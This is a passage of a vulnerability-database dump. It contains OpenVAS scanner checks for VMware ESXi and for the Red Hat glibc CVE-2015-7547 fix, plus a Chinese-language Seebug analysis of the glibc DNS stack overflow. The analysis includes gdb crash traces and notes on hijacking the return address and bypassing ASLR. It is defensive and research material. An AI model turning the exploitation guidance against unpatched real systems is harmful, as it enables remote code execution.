script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"6.0.0\", \"VIB:esx-base:6.0.0-1.29.3568940\",\n \"5.5.0\", \"VIB:esx-base:5.5.0-3.84.3568722\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "The remote host is missing an update for the 'glibc' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2016-02-17T00:00:00", "id": "OPENVAS:1361412562310871557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871557", "type": "openvas", "title": "RedHat Update for glibc RHSA-2016:0175-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2016:0175-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871557\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-17 06:25:59 +0100 (Wed, 17 Feb 2016)\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for glibc RHSA-2016:0175-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C\nlibraries (libc), POSIX thread libraries (libpthread), standard math libraries\n(libm), and the Name Server Caching Daemon (nscd) used by multiple programs on\nthe system. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. 
(CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs:\n\n * The dynamic loader has been enhanced to allow the loading of more shared\nlibraries that make use of static thread local storage. While static thread\nlocal storage is the fastest access mechanism it may also prevent the\nshared library from being loaded at all since the static storage space is a\nlimited and shared process-global resource. Applications which would\npreviously fail with 'dlopen: cannot load any more object with static TLS'\nshould now start up correctly. (BZ#1291270)\n\n * A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of large\nthread-local storage data that exceeded PTHREAD_STACK_MIN in size\n(generally 16 KiB). The bug in librt has been corrected and the impacted\nAPIs no longer return errors when large thread-local storage data is\npresent in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0175-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-February/msg00032.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:16:24", "description": "### 1. \u6f0f\u6d1e\u6982\u8981\r\n\r\nGlibc\u662fGNU\u53d1\u5e03\u7684LIBC\u5e93\u7684C\u8fd0\u884c\u5e93\uff0cGlibc\u662fLinux\u7cfb\u7edf\u4e2d\u6700\u5e95\u5c42\u7684API\uff0c\u57fa\u672c\u5176\u5b83\u4efb\u4f55\u8fd0\u884c\u5e93\u90fd\u4f1a\u4f9d\u8d56\u4e8eGlibc\u3002Glibc\u9664\u4e86\u5c01\u88c5Linux\u64cd\u4f5c\u7cfb\u7edf\u6240\u63d0\u4f9b\u7684\u7cfb\u7edf\u670d\u52a1\u5916\uff0c\u8fd8\u63d0\u4f9b\u4e86\u5176\u5b83\u7684\u5fc5\u8981\u670d\u52a1\u7684\u5b9e\u73b0\u3002\u7531\u4e8e Glibc \u51e0\u4e4e\u5305\u542b\u6240\u6709\u7684 UNIX \u901a\u884c\u7684\u6807\u51c6\uff0c\u53ef\u4ee5\u8bf4\u662f\u64cd\u4f5c\u7cfb\u7edf\u91cd\u8981\u652f\u6491\u5e93\u3002\r\n\r\n\r\n\r\nGlibc\u4e2d\u7684 DNS \u89e3\u6790\u5668\u4e2d\u5b58\u5728\u57fa\u4e8e\u6808\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u5f53\u5728\u7a0b\u5e8f\u4e2d\u8c03\u7528`Getaddrinfo`\u51fd\u6570\u65f6\uff0c\u653b\u51fb\u8005\u81ea\u5b9a\u4e49\u57df\u540d\u6216\u662f\u901a\u8fc7\u4e2d\u95f4\u4eba\u653b\u51fb\u5229\u7528\u8be5\u6f0f\u6d1e\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\u6bd4\u5982\u653b\u51fb\u8005\u5411\u7528\u6237\u53d1\u9001\u5e26\u6709\u6307\u5411\u6076\u610f\u57df\u540d\u7684\u94fe\u63a5\u7684\u90ae\u4ef6\uff0c\u4e00\u65e6\u7528\u6237\u70b9\u51fb\u8be5\u94fe\u63a5\uff0c\u653b\u51fb\u8005\u6784\u9020\u5408\u6cd5\u7684DNS\u8bf7\u6c42\u65f6\u3001\u4ee5\u8fc7\u5927\u7684DNS\u6570\u636e\u56de\u5e94\u4fbf\u4f1a\u5f62\u6210\u5806\u6808\u7f13\u5b58\u533a\u6ea2\u51fa\u5e76\u6267\u884c\u8fdc\u7a0b\u4ee3\u7801\uff0c\u8fbe\u5230\u5b8c\u5168\u63a7\u5236\u7528\u6237\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\n> \u8be5\u6f0f\u6d1e\u5f71\u54cdGlibc 
2.9\u4ee5\u540e\u3001\u4fee\u590d\u7248\u672c2.23\u4e4b\u524d\u7684\u6240\u6709\u7248\u672c\uff0c\u867d\u7136\u53ef\u4ee5\u8fdb\u884c\u8fdc\u7a0b\u6267\u884c\u653b\u51fb,\u653b\u51fb\u8005\u8fd8\u9700\u8981\u89e3\u51b3\u7ed5\u8fc7ASLR\u7b49\u7cfb\u7edf\u5b89\u5168\u673a\u5236\uff08\u540e\u6587\u8c03\u8bd5\u8f93\u51fa\u4e2d\u53ef\u89c1libresolv\u5f15\u7528\u4e86__stack_chk_fail_local\uff0c\u6808\u4fdd\u62a4\u662f\u5426\u8986\u76d6\u6ea2\u51fa\u51fd\u6570\u9700\u5728\u76ee\u6807\u73af\u5883\u786e\u8ba4\uff09\u3002\r\n\r\n### 2. \u6f0f\u6d1e\u590d\u73b0\r\n\r\nGoogle\u63d0\u4f9b\u7684POC\u7531\u4e24\u90e8\u5206\u7ec4\u6210:\r\n\r\n* \u6267\u884c`CVE-2015-7547-POC.py`\u4f5c\u4e3a\u4e00\u4e2a\u4f2a\u9020\u7684DNS\u670d\u52a1\u5668\uff0c\u4f1a\u5411DNS\u5ba2\u6237\u7aef\u53d1\u9001\u6784\u9020\u7684\u9a8c\u8bc1\u6570\u636e\uff0c\u5305\u542b\u8d85\u957f\u5b57\u7b26\u4e32\u3002\r\n\r\n \r\n\r\n* \u6267\u884c\u7f16\u8bd1\u597d\u7684`CVE-2015-7547-CLIENT.c`\u4f5c\u4e3a\u5ba2\u6237\u7aef\uff0c\u5411\u6b64DNS\u670d\u52a1\u5668\u8fdb\u884c\u67e5\u8be2\uff0c\u4f1a\u5728\u6536\u5230\u6570\u636e\u540e\u5bfc\u81f4\u7a0b\u5e8f\u5d29\u6e83\u3002\r\n\r\n \r\n\r\n\u5b9e\u6d4b\u5176\u5b83\u8c03\u7528Glibc\u7684\u7a0b\u5e8f\u4e5f\u4f1a\u56e0\u67e5\u8be2\u57df\u540d\u5bfc\u81f4\u5d29\u6e83\u3002\u4f2a\u9020DNS\u670d\u52a1\u5668\u53d1\u51fa\u7684POC\u6570\u636e\uff0c\u5728TCP DNS\u6570\u636e\u4e2d\u5305\u542b\u4e86\u5927\u91cf\u5b57\u7b26\u201cB\u201d,\u5982\u4e0b :\r\n\r\n\r\n\r\n\u4f7f\u7528IDA\u8fdc\u7a0b\u8c03\u8bd5 Debian \u7cfb\u7edf\u4e0a\u7684CVE-2015-7547-CLIENT\uff0c\u5728\u8c03\u7528Glibc\u7684 `getaddrinfo` 
\u51fd\u6570\u65f6\u51fa\u73b0\u5d29\u6e83\uff0c\u5d29\u6e83\u73b0\u573a\u7684\u72b6\u6001\u5982\u4e0b:\r\n\r\n\r\n\r\n\u7531\u4e8e\u4ea7\u751f\u6ea2\u51fa\u8986\u76d6\uff0c`EDX`\u5bc4\u5b58\u5668\u7684\u503c\u88ab\u63a7\u5236\u4e3a`0x42424242`\uff0c\u5904\u5728\u672a\u4f7f\u7528\u7684\u5730\u5740\u6bb5\uff0c\u5bfc\u81f4\u5728\u5bf9`[EDX+3]`\u8fdb\u884c\u5bfb\u5740\u8bbf\u95ee\u65f6\u9020\u6210\u5f02\u5e38\u3002\u6b64\u65f6\u51fd\u6570\u8c03\u7528\u6808\u5982\u4e0b:\r\n\r\n\r\n\r\n\u6808\u7a7a\u95f4\u4e2d\u88ab\u8986\u76d6\u7684\u6570\u636e\u5982\u4e0b:\r\n\r\n\r\n\r\n### 3.\u6f0f\u6d1e\u539f\u56e0\u548c\u5229\u7528\r\nGlibc\u4e2d\u5bfc\u81f4\u6b64\u6f0f\u6d1e\u7684\u51fd\u6570\u8c03\u7528\u987a\u5e8f\u5982\u4e0b\uff1a\r\n```\r\ngetaddrinfo (getaddrinfo.c) ->\r\n\r\n_nss_dns_gethostbyname4_r (dns-host.c) ->\r\n\r\n__libc_res_nsearch (res_query.c) ->\r\n\r\n__libc_res_nquery (res_query.c) ->\r\n\r\n__libc_res_nsend (res_send.c) ->\r\n\r\nsend_vc (res_send.c)\r\n```\r\n\u5b58\u5728\u6ea2\u51fa\u6f0f\u6d1e\u7684\u7f13\u51b2\u533a\u662f\u5728_nss_dns_gethostbyname4_r\u51fd\u6570\u4e2d\u7533\u8bf7\u7684\u3002\r\n\r\n\r\n\r\n\r\n\u53ef\u4ee5\u770b\u5230\u5728_nss_dns_gethostbyname4_r\u51fd\u6570\u4e2d\uff0c\u4f7f\u7528alloca\u51fd\u6570\u7533\u8bf7\u4e862048\u5b57\u8282\u7684\u5185\u5b58\u7a7a\u95f4\u3002alloca\u51fd\u6570\u7684\u529f\u80fd\u662f\u52a8\u6001\u5f00\u8f9f\u6808\u5730\u5740\u7a7a\u95f4\uff0c\u4f46\u5982\u679c\u53c2\u6570\u662f\u4e2a\u56fa\u5b9a\u5927\u5c0f\u7684\u503c\uff0c\u6c47\u7f16\u4ee3\u7801\u5c31\u751f\u6210\u4e3a\u628aESP\u51cf\u53bb\u56fa\u5b9a\u503c\u3002\u8c03\u8bd5\u5206\u6790\u6808\u7684\u5e03\u5c40\u53ef\u4ee5\u53d1\u73b0\uff0chost_buffer\u7b49\u5c40\u90e8\u53d8\u91cf\u662f\u5904\u5728\u6808\u7684\u9ad8\u5730\u5740\uff0calloca\u5206\u914d\u7684\u5185\u5b58\u662f\u5904\u5728\u6808\u7684\u4f4e\u5730\u5740\uff0c\u8fd92048\u5b57\u8282\u88ab\u6ea2\u51fa\u4e4b\u540e\u4f1a\u8986\u76d6\u6389host_buffer\u7b49\u53d8\u91cf\u3002\r\n\r\n\u4ece\u4ee5\u4e0a\
u4e24\u56fe\u53ef\u4ee5\u770b\u51fa\uff0c\u8fdb\u5165_nss_dns_gethostbyname4_r\u51fd\u6570\u65f6\uff0c\u8fd4\u56de\u5730\u5740\u6240\u5728\u6808\u4e2d\u7684\u4f4d\u7f6e\u662f0xBFFFF560\u3002\u800c\u5f53\u5b8c\u6210\u6ea2\u51fa\u8986\u76d6\u5bfc\u81f4\u8bbf\u95ee\u5f02\u5e38\u65f6\uff0c\u6b64\u8fd4\u56de\u5730\u5740\u5904\u7684\u503c\u5df2\u7ecf\u88ab\u6539\u5199\u4e3a0x42424242\u3002\r\n\r\n_nss_dns_gethostbyname4_r\u51fd\u6570\u4e2d\u8c03\u7528\u4e86__libc_res_nsearch\u51fd\u6570\u8fdb\u884c\u5b9e\u9645\u57df\u540d\u67e5\u8be2\uff0c\u628a\u5c40\u90e8\u53d8\u91cfhost_buffer\u7684\u6808\u5730\u5740\u4f5c\u4e3a\u53c2\u6570\u4f20\u9012\u8fdb\u53bb\uff0c\u7528\u4e8e\u4fdd\u5b58DNS\u670d\u52a1\u5668\u6570\u636e\u7684\u5b9e\u9645\u5b58\u50a8\u5730\u5740\u3002\u6700\u7ec8\u4f1a\u8c03\u7528\u5230send_vc\u51fd\u6570\uff0c\u5728\u63a5\u6536\u5927\u4e8e2048\u5b57\u8282\u7684\u6570\u636e\u4e4b\u524d\uff0c\u672c\u5e94\u8be5\u5728\u5224\u65ad\u7f13\u51b2\u533a\u5927\u5c0f\u4e0d\u591f\u65f6\u53bb\u5206\u914d\u66f4\u5927\u7684\u5806\u5185\u5b58\uff0c\u4f46\u7531\u4e8e\u5b58\u5728\u4e00\u6bb5\u4e0d\u592a\u6210\u719f\u7684\u6d4b\u8bd5\u4ee3\u7801\u7ed3\u679c\u9020\u6210\u4e86\u903b\u8f91\u9519\u8bef\uff0c\u4f7f\u5f97\u5224\u65ad\u7f13\u51b2\u533a\u8fc7\u5c0f\u7684\u6761\u4ef6\u6c38\u8fdc\u4e0d\u6210\u7acb\uff0c\u8fd9\u6837\u5c31\u4e0d\u4f1a\u53bb\u5206\u914d\u5927\u5185\u5b58\uff0c\u5bfc\u81f4\u6570\u636e\u4fdd\u5b58\u5230alloca\u5206\u914d\u7684\u6808\u5185\u5b58\u4e2d\uff0c\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\u5728\u6700\u65b0\u53d1\u5e03\u7684glibc 
2.23\u7248\u8865\u4e01\u4e2d\uff0c\u8fd9\u6bb5\u4e0d\u6210\u719f\u7684\u4ee3\u7801\u5df2\u88ab\u5220\u6389\uff0c\u89e3\u51b3\u4e86\u6b64\u6f0f\u6d1e\u3002\r\n\r\nPOC\u5bfc\u81f4\u7a0b\u5e8f\u5d29\u6e83\u7684\u539f\u56e0\uff0c\u662f\u7531\u4e8e\u51fa\u73b0\u7f13\u51b2\u533a\u6ea2\u51fa\u540e\uff0c\u5728__libc_res_nquery\u51fd\u6570\u4e2d\u4f1a\u8bbf\u95eehost_buffer\u6307\u9488\u6240\u6307\u5411\u7684\u5730\u5740\uff0c\u4f46\u6b64\u503c\u5df2\u7ecf\u88ab\u8986\u76d6\u4e3a0x42424242\uff0c\u662f\u4e0d\u53ef\u8bbf\u95ee\u7684\u5730\u5740\uff0c\u9700\u8981\u628a\u8fd9\u4e2a\u503c\u8986\u76d6\u4e3a\u4e00\u4e2a\u53ef\u8bbf\u95ee\u5730\u5740\u3002\r\n\r\n\u4e3a\u4e86\u5b9e\u73b0\u6f0f\u6d1e\u5229\u7528\uff0c\u8981\u8986\u76d6_nss_dns_gethostbyname4_r\u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u3002\u4f46\u662f\u5728\u6b64\u51fd\u6570\u8fd4\u56de\u4e4b\u524d\uff0c\u8fd8\u8981\u8fdb\u884c\u4e00\u6b21free\u7684\u64cd\u4f5c\u3002\u4f1a\u5224\u65adhost_buffer\u6307\u9488\u662f\u5426\u8fd8\u662falloca\u5206\u914d\u7684\u6808\u5730\u5740\uff0c\u5982\u679c\u88ab\u6539\u53d8\u4e86\uff0c\u5c31\u8bf4\u660e\u53c8\u91cd\u65b0\u5206\u914d\u4e86\u5806\u5185\u5b58\uff0c\u9700\u8981\u8fdb\u884c\u5185\u5b58\u91ca\u653e\u3002\u4f46\u5982\u679c\u6b64\u53d8\u91cf\u88ab\u6ea2\u51fa\u8986\u76d6\u6210\u5176\u5b83\u503c\u4e86\uff0c\u5c31\u4f1a\u5bfc\u81f4\u91ca\u653e\u8fd9\u4e2a\u975e\u5806\u5185\u5b58\u5730\u5740\u65f6\uff0c\u51fa\u73b0\u7a0b\u5e8f\u5f02\u5e38\uff0c\u4e0d\u80fd\u7ee7\u7eed\u52a0\u8f7d\u8fd4\u56de\u5730\u5740\u3002\u6240\u4ee5\u89e3\u51b3\u7684\u529e\u6cd5\u662f\uff0c\u5728\u6ea2\u51fa\u8986\u76d6\u540e\u8981\u4e48\u4e0d\u6539\u53d8\u8fd9\u4e2a\u6307\u9488\u7684\u6808\u5730\u5740\u503c\uff0c\u8981\u4e48\u4fee\u6539\u4e3a\u4e00\u4e2a\u6709\u6548\u7684\u5806\u5757\u8d77\u59cb\u5730\u5740\u3002Glibc\u6a21\u5757\u5728\u51fd\u6570\u4ee3\u7801\u4e2d\u6ca1\u6709\u8fdb\u884c\u6808\u6ea2\u51fa\u68c0\u67e5\uff0c\u4e4b\u540e\u5373\u53ef\u5728\u51fd\u6570\u8fd4\u56de\u65f6\u63a7\u5236\u7a0b\u5e
8f\u6d41\u7a0b\u3002\r\n\r\n\u4f46\u662f\u5728\u5f00\u542f\u5730\u5740\u968f\u673a\u5316\u7684\u60c5\u51b5\u4e0b\uff0c\u5982\u679c\u6ca1\u6709\u529e\u6cd5\u6cc4\u9732\u5185\u5b58\u5730\u5740\u5e03\u5c40\uff0c\u5355\u72ec\u9760\u8fd9\u4e00\u6f0f\u6d1e\u662f\u65e0\u6cd5\u6210\u529f\u5229\u7528\u7684\u3002\r\n### 4. \u6f0f\u6d1e\u5206\u6790\uff08\u8be5\u90e8\u5206\u5185\u5bb9\u6765\u81ea\u7528\u6237k0sh1\uff09\r\n\u5728\u56de\u6eaf\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u9700\u8981\u7740\u91cd\u89c2\u5bdf\u7684\u662f\uff0c\u7a76\u7adf\u662f\u4f55\u65f6\u6808\u4e2d\u88ab\u7578\u5f62\u5b57\u7b26\u4e32\u8986\u76d6\uff0c\u53c8\u662f\u5728\u4f55\u5904\uff0c\u5bfc\u81f4\u7578\u5f62\u5b57\u7b26\u4e32\u7684\u8bfb\u53d6\u3002\r\n\r\n\u9996\u5148\u6211\u4eec\u5c31\u4ece\u79bb\u5d29\u6e83\u73b0\u573a\u5df2\u77e5\u6700\u8fdc\u7aef\u5165\u624b\uff0c\u8fdb\u884c\u5206\u6790\u3002\u6839\u636ebt\u56de\u6eaf\u7684\u4fe1\u606f\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230nss_dns_gethostbyname4_r\u662fnss_dns/dns-host.c\u4e2d\u7684\u51fd\u6570\uff0c\u8fd9\u4e2a.c\u6587\u4ef6\u5bf9\u5e94\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u662flibnss_dns.so.2\uff0c\u90a3\u4e48\u6211\u4eec\u9700\u8981\u5728\u52a0\u8f7d\u52a8\u6001\u94fe\u63a5\u5e93\u540e\u5bf9\u8fd9\u4e2a\u51fd\u6570\u4e0b\u65ad\u70b9\uff0c\u6211\u4eec\u4f7f\u7528gdb\u4e2d\u7684catch load libnss_dns.so.2\u5bf9\u52a8\u6001\u94fe\u63a5\u5e93\u52a0\u8f7d\u8fdb\u884c\u8ddf\u8e2a\u3002\r\n\r\n```\r\ngdb-peda$ catch load libnss_dns.so.2\r\nCatchpoint 1 (load)\r\ngdb-peda$ run\r\nStarting program: /root/Desktop/CVE-2015-7547-master/CVE-2015-7547-master/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbfffe98c --> 0xbfffeb50 (\"libnss_dns.so.2\")\r\nEBX: 0xb7fff000 --> 0x22f0c \r\nECX: 0x4 \r\nEDX: 0x9 ('\\t')\r\nESI: 0x0 \r\nEDI: 0x4 \r\nEBP: 0xbfffe868 --> 0xbfffe9c8 --> 0xbfffeb88 --> 0xbfffebb8 --> 0xbffff0e8 --> 0xbffff218 --> 0xbffff268 --> 0x0 \r\nESP: 0xbfffe800 --> 0x804bff0 --> 0xb7e04000 
--> 0x464c457f \r\nEIP: 0xb7fef15a (<dl_open_worker+970>:\tnop)\r\nEFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7fef153 <dl_open_worker+963>:\ttest eax,eax\r\n 0xb7fef155 <dl_open_worker+965>:\tje 0xb7fef15b <dl_open_worker+971>\r\n 0xb7fef157 <dl_open_worker+967>:\tmov eax,DWORD PTR [ebp+0x8]\r\n=> 0xb7fef15a <dl_open_worker+970>:\tnop\r\n 0xb7fef15b <dl_open_worker+971>:\tmov eax,DWORD PTR [ebp+0x8]\r\n 0xb7fef15e <dl_open_worker+974>:\tsub esp,0xc\r\n 0xb7fef161 <dl_open_worker+977>:\tmov ecx,DWORD PTR [eax+0x1c]\r\n 0xb7fef164 <dl_open_worker+980>:\tmov edx,DWORD PTR [eax+0x18]\r\n[------------------------------------stack-------------------------------------]\r\n\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nCatchpoint 1\r\n Inferior loaded /lib/i386-linux-gnu/libnss_dns.so.2\r\n /lib/i386-linux-gnu/libresolv.so.2\r\n0xb7fef15a in dl_open_worker (a=0xbfffe98c) at dl-open.c:572\r\n572\tdl-open.c: No such file or directory.\r\n```\r\n\r\n\u7a0b\u5e8f\u4e2d\u65ad\u540e\uff0c\u8bf4\u660e\u52a8\u6001\u94fe\u63a5\u5e93\u5df2\u7ecf\u88ab\u52a0\u8f7d\uff0c\u8fd9\u65f6\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u7ed9_nss_dns_gethostbyname4_r\u4e0b\u65ad\u70b9\u4e86\u3002\r\n\r\n```\r\ngdb-peda$ delete\r\ngdb-peda$ b _nss_dns_gethostbyname4_r\r\nBreakpoint 2 at 0xb7e064d0: file nss_dns/dns-host.c, line 284.\r\ngdb-peda$ run\r\nStarting program: /root/Desktop/CVE-2015-7547-master/CVE-2015-7547-master/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff0c4 --> 0x0 \r\nEBX: 0xb7fd3000 --> 0x19cd64 \r\nECX: 0xbfffeb27 --> 0x0 \r\nEDX: 0xb7e064d0 (<_nss_dns_gethostbyname4_r>:\tpush ebp)\r\nESI: 0xb7e064d0 (<_nss_dns_gethostbyname4_r>:\tpush ebp)\r\nEDI: 0x420 \r\nEBP: 0xbffff0e8 --> 0xbffff218 --> 0xbffff268 --> 0x0 
\r\nESP: 0xbfffebac --> 0xb7efddbc (<gaih_inet+3495>:\tadd esp,0x20)\r\nEIP: 0xb7e064d0 (<_nss_dns_gethostbyname4_r>:\tpush ebp)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7e064c8 <_nss_dns_gethostbyname_r+136>:\tpop ebx\r\n 0xb7e064c9 <_nss_dns_gethostbyname_r+137>:\tret \r\n 0xb7e064ca:\tlea esi,[esi+0x0]\r\n=> 0xb7e064d0 <_nss_dns_gethostbyname4_r>:\tpush ebp\r\n 0xb7e064d1 <_nss_dns_gethostbyname4_r+1>:\tmov ebp,esp\r\n 0xb7e064d3 <_nss_dns_gethostbyname4_r+3>:\tpush edi\r\n 0xb7e064d4 <_nss_dns_gethostbyname4_r+4>:\tpush esi\r\n 0xb7e064d5 <_nss_dns_gethostbyname4_r+5>:\tpush ebx\r\n[------------------------------------stack-------------------------------------]\r\n\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, _nss_dns_gethostbyname4_r (name=0x8048653 \"foo.bar.google.com\", \r\n pat=0xbffff0c8, buffer=0xbfffebd0 \"\\377\\002\", buflen=0x420, \r\n errnop=0xbffff0c4, herrnop=0xbffff0b0, ttlp=0x0) at nss_dns/dns-host.c:284\r\n284\tnss_dns/dns-host.c: No such file or directory.\r\n```\r\n\r\n\u987a\u5229\u5728\u5165\u53e3\u5904\u65ad\u4e86\u4e0b\u6765\uff0c\u8fd9\u65f6\u6211\u4eec\u7ee7\u7eed\u6309c\uff0c\u8fdb\u884ccontinue\u64cd\u4f5c\u53d1\u73b0\u76f4\u63a5\u5230\u8fbe\u6f0f\u6d1e\u73b0\u573a\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u5c31\u4e0d\u5c55\u793a\u4e86\uff0c\u53ef\u4ee5\u5728\u8ddf\u8e2a\u8c03\u8bd5\u65f6\u8fdb\u884c\uff0c\u8fd9\u8bf4\u660e\u8fdb\u5165\u6b64\u51fd\u6570\u662f\u6f0f\u6d1e\u89e6\u53d1\u524d\u552f\u4e00\u4e00\u6b21\u8c03\u7528\u5230_nss_dns_gethostbyname4_r\u51fd\u6570\u7684\u4f4d\u7f6e\uff0c\u6211\u4eec\u901a\u8fc7bt\u6765\u89c2\u5bdf\u4e00\u4e0b\u3002\r\n\r\n```\r\ngdb-peda$ bt\r\n#0 _nss_dns_gethostbyname4_r (name=0x8048653 \"foo.bar.google.com\", \r\n pat=0xbffff0c8, buffer=0xbfffebd0 \"\\377\\002\", buflen=0x420, \r\n 
